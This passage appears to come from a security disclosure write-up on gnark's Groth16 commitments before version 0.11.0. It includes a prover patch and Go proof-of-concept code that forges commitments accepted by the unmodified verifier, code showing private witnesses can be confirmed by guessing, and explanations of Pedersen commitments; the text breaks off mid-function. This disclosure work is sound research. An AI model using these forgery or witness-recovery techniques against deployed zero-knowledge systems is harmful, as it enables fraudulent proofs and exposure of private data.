@@ -60,7 +60,7 @@ func (proof *Proof) CurveID() ecc.ID {
 }
 
 // Prove generates the proof of knowledge of a r1cs with full witness (secret + public part).
-func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...backend.ProverOption) (*Proof, error) {
+func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, fakeCommitments []curve.G1Affine, opts ...backend.ProverOption) (*Proof, error) {
 	opt, err := backend.NewProverConfig(opts...)
 	if err != nil {
 		return nil, fmt.Errorf("new prover config: %w", err)
@@ -91,10 +91,7 @@ func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...b
 			privateCommittedValues[i][j].SetBigInt(inJ)
 		}
 
-		var err error
-		if proof.Commitments[i], err = pk.CommitmentKeys[i].Commit(privateCommittedValues[i]); err != nil {
-			return err
-		}
+		proof.Commitments[i] = fakeCommitments[i]
 
 		opt.HashToFieldFn.Write(constraint.SerializeCommitment(proof.Commitments[i].Marshal(), hashed, (fr.Bits-1)/8+1))
 		hashBts := opt.HashToFieldFn.Sum(nil)
diff --git a/backend/groth16/groth16.go b/backend/groth16/groth16.go
index ca5b8bdc..36f3d459 100644
--- a/backend/groth16/groth16.go
+++ b/backend/groth16/groth16.go
@@ -179,7 +179,8 @@ func Prove(r1cs constraint.ConstraintSystem, pk ProvingKey, fullWitness witness.
 		if icicle_bn254.HasIcicle {
 			return icicle_bn254.Prove(_r1cs, pk.(*icicle_bn254.ProvingKey), fullWitness, opts...)
 		}
-		return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
+		panic("changed stuff for poc")
+		//return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
 
 	case *cs_bw6761.R1CS:
 		return groth16_bw6761.Prove(_r1cs, pk.(*groth16_bw6761.ProvingKey), fullWitness, opts...)

The patch only makes a very small change: the Groth16 prover for the bn254 elliptic curve takes one extra argument, fakeCommitments, and instead of calculating the commitments, it just uses the ones that were passed with fakeCommitments. Because the signature of the Prove function was changed, we also need to fix one other place of the codebase to make it compile (the generic Prove function for Groth16, without specializing to concrete types for a specific curve).

By using a patched version of gnark as above, the following code then demonstrates the issue:

package main

import (
	"crypto/sha256"
	"fmt"
	"log"
	"math/big"
	"math/rand"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark-crypto/ecc/bn254/fr"
	"github.com/consensys/gnark-crypto/ecc/bn254/fr/hash_to_field"
	fiatshamir "github.com/consensys/gnark-crypto/fiat-shamir"
	"github.com/consensys/gnark/backend"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/constraint"
	cs_bn254 "github.com/consensys/gnark/constraint/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

// Our circuit has two private witnesses
type Circuit struct {
	A frontend.Variable
	B frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}

	// We commit to both A and B separately, obtaining two challenges.
	challenge_A, err := commitCompiler.Commit(circuit.A)
	if err != nil {
		return err
	}
	challenge_B, err := commitCompiler.Commit(circuit.B)
	if err != nil {
		return err
	}

	// To have some constraints involving the private witnesses and challenges, we constraint them to be nonzero.
	api.AssertIsDifferent(challenge_A, 0)
	api.AssertIsDifferent(challenge_B, 0)
	api.AssertIsDifferent(circuit.A, 0)
	api.AssertIsDifferent(circuit.B, 0)

	// The two challenges should depend on the value assigned to the respective circuit variables
	// in such a way that it is impossible to change the underlying circuit variable's values
	// without the corresponding challenges changing as well.
	// We demonstrate that this does not hold and we can choose the circuit variable being committed to
	// *after* fixing the challenge that should randomly depend on it, by constraining
	// the challenge to be a constant. We will still be able to prove the circuit for
	// any value assigned to the circuit variables.
	var hashOfZero fr.Element
	var hashOfZeroBigInt big.Int
	hashOfZeroBigInt.SetString("14057090015281774264105022686285549399478565317353443989948588114876049265504", 10)
	hashOfZero.SetBigInt(&hashOfZeroBigInt)
	fmt.Println("Constraining the challange based on the commitment to A to be the hash of zero: ", hashOfZero.String())
	api.AssertIsEqual(challenge_A, hashOfZero)

	return nil
}

func main() {
	// Setup circuit
	var circ Circuit
	ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
	if err != nil {
		panic(err)
	}

	// Assigning some random values.
	A := *big.NewInt(rand.Int63())
	B := *big.NewInt(rand.Int63())
	var w Circuit
	w.A = A
	w.B = B
	fmt.Println("Assigning random value A = ", A.String())
	fmt.Println("Assigning random value B = ", B.String())

	// Running setup, and prover.
	witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
	if err != nil {
		panic(err)
	}
	witnessPublic, err := witness.Public()
	if err != nil {
		panic(err)
	}
	pk, vk, err := groth16.Setup(ccs)
	if err != nil {
		panic(err)
	}

	// Converting proving key to concrete type
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}

	// Construct fake commitment, and associated proof of knowledge.
	// In this case, we make the first commitment zero.
	commitments, commitmentPok := fakeCommitment(*pkConcrete, A, B, *big.NewInt(0), *big.NewInt(0))

	// groth16_bn254.Prove has been modified to use our supplied commitments instead of
	// calculating the legitimate ones.
	fakeProof, err := groth16_bn254.Prove(ccs.(*cs_bn254.R1CS), pkConcrete, witness, commitments)
	if err != nil {
		panic(err)
	}
	// The proof of knowledge for the commitment calculated by groth16_bn254.Prove will not
	// fit our fake commitments, so we replace it with the previously calculated pok.
	fakeProof.CommitmentPok = commitmentPok

	// groth16.Verify has not been modified, yet it accepts our proof with incorrect commitments.
	err = groth16.Verify(fakeProof, vk, witnessPublic)
	if err != nil {
		panic(err)
	}
}

// Constructs fake commitments. Only works for two commitments to one circuit variable each.
// Will fake the first commitment to be FirstCommitmentA*Base[0] + FirstCommitmentB*Base[1]
// instead of the expected AReal*Base[0]. Will also calculate the corresponding proof of knowledge.
func fakeCommitment(pk groth16_bn254.ProvingKey, AReal big.Int, BReal big.Int, FirstCommitmentA big.Int, FirstCommitmentB big.Int) ([]bn254.G1Affine, bn254.G1Affine) {
	expConfig := ecc.MultiExpConfig{
		NbTasks: 1,
	}

	// Casting values to Fr elements
	var ARealFr fr.Element
	var BRealFr fr.Element
	var FirstCommitmentAFr fr.Element
	var FirstCommitmentBFr fr.Element
	ARealFr.SetBigInt(&AReal)
	BRealFr.SetBigInt(&BReal)
	FirstCommitmentAFr.SetBigInt(&FirstCommitmentA)
	FirstCommitmentBFr.SetBigInt(&FirstCommitmentB)

	// Get the commitment key basis elements
	basisPointsA, err := getBasisField(&pk.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	basisPointsB, err := getBasisField(&pk.CommitmentKeys[1])
	if err != nil {
		panic(err)
	}

	commitments := make([]bn254.G1Affine, 2)
	exponents := make([]fr.Element, 2)

	// commitments[0] = FCA * Base[0] + FCB * Base[1]
	exponents[0] = FirstCommitmentAFr
	exponents[1] = FirstCommitmentBFr
	commitments[0].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

	// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
	exponents[0].Sub(&ARealFr, &FirstCommitmentAFr)
	exponents[1].Sub(&BRealFr, &FirstCommitmentBFr)
	commitments[1].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

	//commitmentPublicInputs, commitmentsSerialized, err := getCommitmentsHashes(commitments)
	_, commitmentsSerialized, err := getCommitmentsHashes(commitments)
	if err != nil {
		panic(err)
	}
	//The printout below can be used to get that constant we use in the circuit constraints
	//fmt.Println("first commitment public input = ", commitmentPublicInputs[0].String())

	// Get the challenge for commitment folding.
	r, err := getChallenge(commitmentsSerialized)
	if err != nil {
		panic(err)
	}

	// Calculation of the proof of knowledge going along with the commitments:

	// commitments[0] = FCA * Base[0] + FCB * Base[1]
	// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
	// foldedCommitment = (FCA + r*(A - FCA)) * Base[0] + (FCB + r*(B - FCB)) * Base[1]

	exponents[0].Mul(&exponents[0], &r)
	exponents[0].Add(&exponents[0], &FirstCommitmentAFr)

	exponents[1].Mul(&exponents[1], &r)
	exponents[1].Add(&exponents[1], &FirstCommitmentBFr)

	basisExpSigmaPointsA, err := getBasisExpSigmaField(&pk.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	basisExpSigmaPointsB, err := getBasisExpSigmaField(&pk.CommitmentKeys[1])
	if err != nil {
		panic(err)
	}

	var pok bn254.G1Affine
	pok.MultiExp([]bn254.G1Affine{basisExpSigmaPointsA[0], basisExpSigmaPointsB[0]}, exponents, expConfig)

	return commitments, pok
}

// This function calculates the commitment hashes added to the public inputs,
// and calculates the commitmentsSerialized value used for calculating the challenge in commitment folding.
// The code here is mostly copied from gnark's backend/groth16/bn254/verify.go
func getCommitmentsHashes(commitments []bn254.G1Affine) ([]fr.Element, []byte, error) {
	opt, err := backend.NewVerifierConfig()
	if err != nil {
		return nil, nil, fmt.Errorf("new verifier config: %w", err)
	}
	if opt.HashToFieldFn == nil {
		opt.HashToFieldFn = hash_to_field.New([]byte(constraint.CommitmentDst))
	}
	commitmentHashesAsPublicWitnesses := make([]fr.Element, len(commitments))
	commitmentsSerialized := make([]byte, len(commitments)*fr.Bytes)
	commitmentPrehashSerialized := make([]byte, bn254.SizeOfG1AffineUncompressed)
	for i := range len(commitments) {
		copy(commitmentPrehashSerialized, commitments[i].Marshal())
		opt.HashToFieldFn.Write(commitmentPrehashSerialized[:bn254.SizeOfG1AffineUncompressed])
		hashBts := opt.HashToFieldFn.Sum(nil)
		opt.HashToFieldFn.Reset()
		nbBuf := fr.Bytes
		if opt.HashToFieldFn.Size() < fr.Bytes {
			nbBuf = opt.HashToFieldFn.Size()
		}
		var res fr.Element
		res.SetBytes(hashBts[:nbBuf])
		commitmentHashesAsPublicWitnesses[i] = res
		copy(commitmentsSerialized[i*fr.Bytes:], res.Marshal())
	}

	return commitmentHashesAsPublicWitnesses, commitmentsSerialized, nil
}

// copied from gnark-crypto's source code, ecc/bn254/fr/pedersen/pedersen.go
// (it is a private function, so we can't call it)
func getChallenge(fiatshamirSeeds ...[]byte) (r fr.Element, err error) {
	// incorporate user-provided seeds into the transcript
	t := fiatshamir.NewTranscript(sha256.New(), "r")
	for i := range fiatshamirSeeds {
		if err = t.Bind("r", fiatshamirSeeds[i]); err != nil {
			return
		}
	}

	// obtain the challenge
	var rBytes []byte

	if rBytes, err = t.ComputeChallenge("r"); err != nil {
		return
	}
	r.SetBytes(rBytes) // TODO @Tabaie Plonk challenge generation done the same way; replace both with hash to fr?
	return
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)

	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}

	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}

	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}

	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}

	return basisFieldConcrete, nil
}

// Like getBasisField but for basisExpSigma
func getBasisExpSigmaField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)

	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}

	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basisExpSigma")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basisExpSigma' not found")
	}

	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}

	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}

	return basisFieldConcrete, nil
}

Running this program will produce output such as the following:

17:16:43 INF compiling circuit
17:16:43 INF parsed circuit inputs nbPublic=0 nbSecret=2
Constraining the challange based on the commitment to A to be the hash of zero:  14057090015281774264105022686285549399478565317353443989948588114876049265504
17:16:43 INF building constraint builder nbConstraints=5
Assigning random value A =  2593177307956940674
Assigning random value B =  228695105607157038
17:16:43 DBG constraint system solver done nbConstraints=5 took=0.239835
17:16:43 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=5 took=3.831231
17:16:43 DBG verifier done backend=groth16 curve=bn254 took=4.448234

The values assigned to the circuit variables A and B will be fresh, random values each time, but nevertheless, verification does pass for a circuit constraining the challenge based on the commitment to circuit variable A to be a specific constant.

The Fix

After we reported the above vulnerability to gnark, the protocol regarding the proof of knowledge associated to the commitments was changed to the variant using $k+1$ pairings that we discussed above. This fix is included starting from version 0.11.0.

Commitment Schemes

There is a second vulnerability associated to the commitments as used by gnark up to version 0.10.0, related to the proof scheme’s zero-knowledge property.

But before getting into that vulnerability, let us take a step back from the particulars of Groth16 and gnark’s exension to it and discuss what it actually means to talk about commitments. A commitment scheme is a way for a committer to commit to some value in a way that binds them to it. The value should be hidden from the receiver of the commitment, but the committer should be able to open the commitment at some later time, thereby revealing the committed value and convincing the receiver that this was the value they had committed to all along. More precisely, a commitment scheme of the type relevant for us has two main phases as follows:

Commitment: The committer runs a commitment algorithm $\mathcal{C}$ that takes as input a value $x$ (from a predefined set) as well as randomness; outputs $\mathcal{C}(x) = (C, d)$ , consisting of a commitment $C$ and some extra decommitment information $d$ . While $C$ can be published, the committer will keep $d$ for themselves, as this is what they need to open the commitment later. In some cases, $d$ might not be needed.

Opening: At some later time, the committer publishes $x$ and $d$ . Other parties can now run a verification algorithm $\mathcal{V}$ that takes $((C, d), x)$ as input and either accepts (returns 1) or rejects (returns 0).

The idea is that the verification algorithm should only accept $((C, d), x)$ if $x$ is the value that was used as the input to the commitment algorithm that originally produced $C$ . Also, we don’t want it to be possible for anyone to recover $x$ from just $C$ . To be a bit more precise, we can define the following properties such a scheme might satisfy:

Completeness: The verification algorithm accepts on data produced by the commitment algorithm: $\mathcal{V}(\mathcal{C}(x), x) = 1$ .

Binding: It is infeasible for an attacker to produce $C, x, x', d, d'$ so that $\mathcal{V}(\mathcal{C}(x), x) = 1$ and $\mathcal{V}(\mathcal{C}(x'), x') = 1$ but $x\neq x'$ . The upshot of this property is that once $C$ is published, the only value the committer can open $C$ to is the one they originally used when computing $C$ .

Hiding: Given only $C$ , an attacker cannot recover the value $x$ committed to via $C$ . To be more precise, we could ask for this to be computationally infeasible (computationally hiding), but we could also ask for this to be truly impossible because for any $x$ there exists a $d$ such that $C$ can be opened to $x$ , and each $x$ is equally probable as long as the committer chose $d$ to be uniformly random (perfect hiding).

A commitment scheme that is often used is the Pedersen commitment scheme. To introduce it, let $G$ be an abelian group with $p$ elements (with $p$ a prime) and $g_1, \dots, g_n, h$ nonzero elements of $G$ . We now describe how we can use Pedersen commitments to commit to a tuple $(x_1, \dots, x_n)$ of elements of $\mathbb{F}_p$ .

Commitment: Given $(x_1, \dots, x_n)$ , a uniformly random element $d\in\mathbb{F}_p$ is sampled. The commitment and decommitment information is then given by $\mathcal{C}(x) = (C, d) = (d \cdot h + \sum_{i=1}^n x_i \cdot g_i, d)$ .

Verification: The verification algorithm returns 1 if and only if the equality $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ holds.

It is immediate that this scheme is complete as defined above. It is also perfectly hiding. This can be seen as follows: fix $x$ and consider the unformly random distribution on $\mathbb{F}_p$ for $d$ . If $d$ is uniformly random, then $d\cdot h$ is uniformly random as well, as $h$ is nonzero and multiplication by a nonzero element in $\mathbb{F}_p$ is a bijection. Similarly, adding a constant is a bijection as well, so $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ is uniformly random. In particular, the distribution of $C$ is the same no matter what $x$ was, and hence given $C$ , all values for $x$ are equally probable, as long as $d$ is chosen uniformly random.

How about the binding property? The answer to this depends on the group used. For example, if we used $G = \mathbb{Z}/p\mathbb{Z}$ , then this scheme would not be binding at all. Indeed, given a fixed $C$ , finding tuples $(x_1, \dots, x_n,d)$ so that $\mathcal{V}((C, d), (x_1, \dots, x_n)) = 1$ amounts to solving the linear equation $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ . This is easily doable; given any $x_1, \dots, x_n$ we can use $d = h^{-1}\cdot \left(C - \sum_{i=1}^n x_i \cdot g_i\right)$ .

The problem of solving equations of the form $C = d \cdot h + \sum_{i=1}^n x_i \cdot g_i$ in $G$ for $d, x_1, \dots, x_n$ if $h$ and $g_1, \dots, g_n$ are uniformly random elements of $G$ is called the discrete log (relation) problem. That the discrete log problem is hard for $G$ means that it is computatationally intractible to solve such equations. So the Pedersen commitment scheme is computationally binding if the discrete logarithm problem is hard in $G$ and $h$ and $g_1, \dots, g_n$ were chosen as independent uniformly random elements of $G$ . Note that $h, g_1, \dots, g_n$ being independent and uniformly random is necessary, as it is easy to solve the given equation if, for example, $h=g_1=\cdots=g_n$ .

The Zero-Knowledge Vulnerability

Let us now get back to gnark’s extension to Groth16. We will again use the notation from before. As we discussed, the commitments that a gnark Groth16 proof might come with have the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$ . The $a_j$ are private witnesses,² and $L_j$ are points on an elliptic curve for which the discrete logarithm problem is assumed to be hard. But are these commitments $D_i$ rebinding and hiding? We will first begin with the binding property and then discuss the failure for the commitments to be hiding. The commitments not being hiding implies that the proving system does not satisfy zero knowledge, and we discuss the practical impact of this. We also discuss how the standard library’s range checks use commitments, and we provide a proof of concept in which private witnesses are recovered from range checks.

The Binding Property of the Commitments

In this subsection, we consider under which conditions the commitments may have the binding property. By the discussion in the previous section, the commitment will be computationally binding as long as the points $L_j$ are independent uniformly random elements of the elliptic curve.

Before discussing under which condition this property might hold, let us first point out that, unlike the general idea of commitments, the commitments of gnark’s Groth16 extension are not intended to be opened. That the commitment is binding, as defined above, is thus actually not really that relevant.

What is more relevant is that $\mathcal{H}(D_i)$ acts as a random function of the assignments of the circuit variables committed to, as this is what is needed to ultimately use the hash of the commitment as a random challenge depending on the committed-to circuit variables. If we consider the case of only a single commitment, and $\mathcal{H}$ may be treated as a random function, then this requirement essentially boils down to the points $L_j$ being indistinguishable from being independently uniformly random from the perspective of the prover as well and thus is equivalent to the commitment being binding. If there is more than one commitment, then an additional question arises whether the commitments can be treated separately or not. This is precisely what the soundness vulnerability discussed above is about.

Getting back to the binding property, the condition that the relevant $L_j$ are independent and uniformly random is not satisfied in general. Roughly, if the coefficients of some circuit variables in constraints always satisfy a linear relation,³ then the associated $L_j$ will also satisfy this relation.

To illustrate what we mean by this, suppose we are considering a single commitment $D$ to two circuit variables $x$ and $y$ , with $D = x\cdot L_x + y \cdot L_y$ . There may be constraints imposed such as $(c\cdot x+d\cdot y) \cdot (2\cdot c\cdot x + 2\cdot d\cdot y) = z$ or $c\cdot x + d\cdot y = 42$ . The property to note here is that the coefficient for $y$ in each factor and in the linear term is always the same multiple $\frac{d}{c}$ of the coefficient for $x$ . It will then hold that also $L_y = \frac{d}{c}\cdot L_x$ . The upshot of the observation that $d\cdot L_x = c \cdot L_y$ is that the prover knows a relation $d\cdot L_x - c \cdot L_y = 0$ , so if they originally commited to $(x, y)$ , they may also open the commitment to $(x + r\cdot d, y - r\cdot c)$ for any $r\in \mathbb{F}_p$ . Taking the point of view where $\mathcal{H}(D)$ will be used as a random challenge depending on $x$ and $y$ , the prover has, after knowing what the challenge $\mathcal{H}(D)$ will be, still one degree of freedom to adjust $x$ and $y$ . However, this actually does not help the malicious prover. This is because the test being performed using the challenge value (like a Schwartz-Zippel–style equality check) can only depend on $c\cdot x + d\cdot y$ by our assumption, and this value does not change with this adjustment!

We won’t go into detail why the above holds in general, as this will involve the details of Groth16 and its arithmetization in more depth than we cover in this article. The following example demonstrates the observation in practice, however. In it, we define a circuit with two private witnesses, which we commit together. We add constraints as above and then check that the relation $d\cdot L_x = c \cdot L_y$ indeed holds.

package main

import (
	"fmt"
	"log"
	"math/big"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

const c = 5
const d = 7

type Circuit struct {
	SecretWitnessX frontend.Variable
	SecretWitnessY frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}

	_, err := commitCompiler.Commit(circuit.SecretWitnessX, circuit.SecretWitnessY)
	if err != nil {
		return err
	}

	// We add some constraints where the ratio between the coefficients for Y and X is always d/c.
	sum1 := api.Add(api.Mul(c, circuit.SecretWitnessX), api.Mul(d, circuit.SecretWitnessY))
	sum2 := api.Add(api.Mul(2*c, circuit.SecretWitnessX), api.Mul(2*d, circuit.SecretWitnessY))
	api.Mul(sum1, sum2)
	api.AssertIsEqual(sum1, c*42+d*47)
	return nil
}

func main() {
	// Setup circuit
	var circ Circuit
	ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
	if err != nil {
		panic(err)
	}

	// Assigning some values.
	var w Circuit
	w.SecretWitnessX = 42
	w.SecretWitnessY = 47

	// Running setup and prover.
	witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
	if err != nil {
		panic(err)
	}
	witnessPublic, err := witness.Public()
	if err != nil {
		panic(err)
	}
	pk, vk, err := groth16.Setup(ccs)
	if err != nil {
		panic(err)
	}
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}
	proof, err := groth16.Prove(ccs, pk, witness)
	if err != nil {
		panic(err)
	}

	commitmentPk := &pkConcrete.CommitmentKeys[0]
	basisFieldConcrete, err := getBasisField(commitmentPk)
	if err != nil {
		fmt.Println("Error:", err)
		return
	}

	// Check the linear relation satisfied by the basis elements for the commitments
	scaledBasisX := new(bn254.G1Affine)
	scaledBasisX.ScalarMultiplication(&basisFieldConcrete[0], big.NewInt(d))
	scaledBasisY := new(bn254.G1Affine)
	scaledBasisY.ScalarMultiplication(&basisFieldConcrete[1], big.NewInt(c))
	fmt.Println("d*basis[0] == c*basis[1] :", *scaledBasisX == *scaledBasisY)

	err = groth16.Verify(proof, vk, witnessPublic)
	if err != nil {
		panic(err)
	}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)

	if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
		return nil, fmt.Errorf("expected a pointer to a struct")
	}

	// Access the 'basis' field
	basisField := commitmentPkValue.Elem().FieldByName("basis")
	if !basisField.IsValid() {
		return nil, fmt.Errorf("field 'basis' not found")
	}

	if !basisField.CanInterface() {
		// To access an unexported field, we need to bypass safety
		basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
	}

	basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
	if !ok {
		return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
	}

	return basisFieldConcrete, nil
}

The output will be as follows:

17:21 INF compiling circuit
17:21 INF parsed circuit inputs nbPublic=0 nbSecret=2
17:21 INF building constraint builder nbConstraints=2
17:21 DBG constraint system solver done nbConstraints=2 took=0.771787
17:21 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.421542
d*basis[0] == c*basis[1] : true
17:21 DBG verifier done backend=groth16 curve=bn254 took=3.512609

We have now described one specific way in which the commitment is not binding or $\mathcal{H}(D_i)$ not a random function of the committed-to circuit variables, but we have also argued why this is not an issue in practice. This raises the question whether this is the only manner in which this property fails, so that $\mathcal{H}(D_i)$ satisfies the security property required of it for use as a random challenge needed in practice. The author expects that this is the case, but we have not attempted to formally define the required property and prove it.

The Hiding Property of the Commitments

In comparison with Pedersen commitments discussed before, the commitments used by gnark, being of the form $D_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j$ , lack the blinding summand $d\cdot h$ , which is what makes Pedersen commitments perfectly hiding. The commitments used by gnark (before version 0.11.0) were thus not hiding. What does this mean in practice?

Let us consider a single commitment $D = \sum_{i=1}^{k} a_i \cdot L_i$ . Suppose the attacker, who has only access to $D$ and $L_i$ , but not the original $a_i$ used to calculate $D$ , makes a guess for the values of $a_i$ , with the guessed values being $a'_i$ for $a_i$ . Then the attacker can verify whether that guess is correct by checking $D \stackrel{?}{=} \sum_{i=1}^k a'_i \cdot L_i$ . If equality holds, then either $a_i = a'_i$ for all $1 \leq i \leq k$ or a linear relation $\sum_{i=1}^k (a_i - a'_i) \cdot L_i$ has been found, which we assume does not occur in practice by the hardness of the discrete logarithm problem as long as $L_1, \dots, L_k$ are independently uniformly random. Hence, in practice (putting aside exceptions to the binding property discussed in the previous subsection), the equality holding implies that the attacker found the original values used by the prover.

An attacker can thus use $D$ and $L_1, \dots, L_k$ to brute-force the original values of $a_1, \dots, a_k$ . If the attacker has no information about what $a_1, \dots, a_k$ might be — in other words, from their perspective, $(a_1, \dots, a_k)$ is a uniformly random element of $\mathbb{F}_p^k$ — then this will be infeasible in practice, as the search space will be intractably large. However, if there is only a small number of possibilities for each $a_1$ to $a_k$ , then it may be feasible to search the entire search space. For example, $a_i$ might be a leaf in a Merkle tree, with the circuit verifying a Merkle inclusion proof and being intended to protect knowledge of which leaf was used in the proof. If the leaves are publicly known, then it might be feasible for an attacker to verify guesses for each leaf.

The failure of the commitments to be binding is related to the extended Groth16 system’s zero-knowledge property. The zero-knowledge property requires that it should be impossible to extract any knowledge about the private witnesses from the proof, except that the prover knows private witnesses that satisfy the circuit’s constraints. The just described issue implies that it is possible to extract information about those private witnesses that are involved in commitments, violating the zero-knowledge property.

The following code demonstrates this. We define a simple circuit, with a single private witness that is committed. We assign the private witness the value 42. The code then checks that the commitment that comes with the proof is indeed given by 42 times the corresponding basis element that is part of the proving key.

package main

import (
	"fmt"
	"log"
	"math/big"
	"reflect"
	"unsafe"

	"github.com/consensys/gnark-crypto/ecc"
	"github.com/consensys/gnark-crypto/ecc/bn254"
	"github.com/consensys/gnark/backend/groth16"
	groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
	"github.com/consensys/gnark/frontend"
	"github.com/consensys/gnark/frontend/cs/r1cs"
)

const secret = 42

type Circuit struct {
	SecretWitness frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
	commitCompiler, ok := api.Compiler().(frontend.Committer)
	if !ok {
		return fmt.Errorf("compiler does not commit")
	}

	commit, err := commitCompiler.Commit(circuit.SecretWitness)
	if err != nil {
		return err
	}

	api.AssertIsDifferent(commit, 0)
	api.AssertIsDifferent(circuit.SecretWitness, 0)
	return nil
}

func main() {
	// Setup circuit
	var circ Circuit
	ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
	if err != nil {
		panic(err)
	}

	// Assigning some values.
	var w Circuit
	w.SecretWitness = secret

	// Running setup and prover.
	witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
	if err != nil {
		panic(err)
	}
	witnessPublic, err := witness.Public()
	if err != nil {
		panic(err)
	}
	pk, vk, err := groth16.Setup(ccs)
	if err != nil {
		panic(err)
	}
	pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
	if !ok {
		log.Fatal("unexpected type for proving key")
	}
	proof, err := groth16.Prove(ccs, pk, witness)
	if err != nil {
		panic(err)
	}
	proofConcrete, ok := proof.(*groth16_bn254.Proof)
	if !ok {
		log.Fatal("unexpected type for proof")
	}

	// We check our guess for the secret witness.
	var guess_test bn254.G1Affine
	basisPoints, err := getBasisField(&pkConcrete.CommitmentKeys[0])
	if err != nil {
		panic(err)
	}
	guess_test.ScalarMultiplication(&basisPoints[0], big.NewInt(secret))
	fmt.Println("Commitment equal to secret times commitment key basis element: ", guess_test == proofConcrete.Commitments[0])

	err = groth16.Verify(proof, vk, witnessPublic)
	if err != nil {
		panic(err)
	}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
	// Reflect on the pointer
	commitmentPkValue := reflect.ValueOf(commitmentPk)

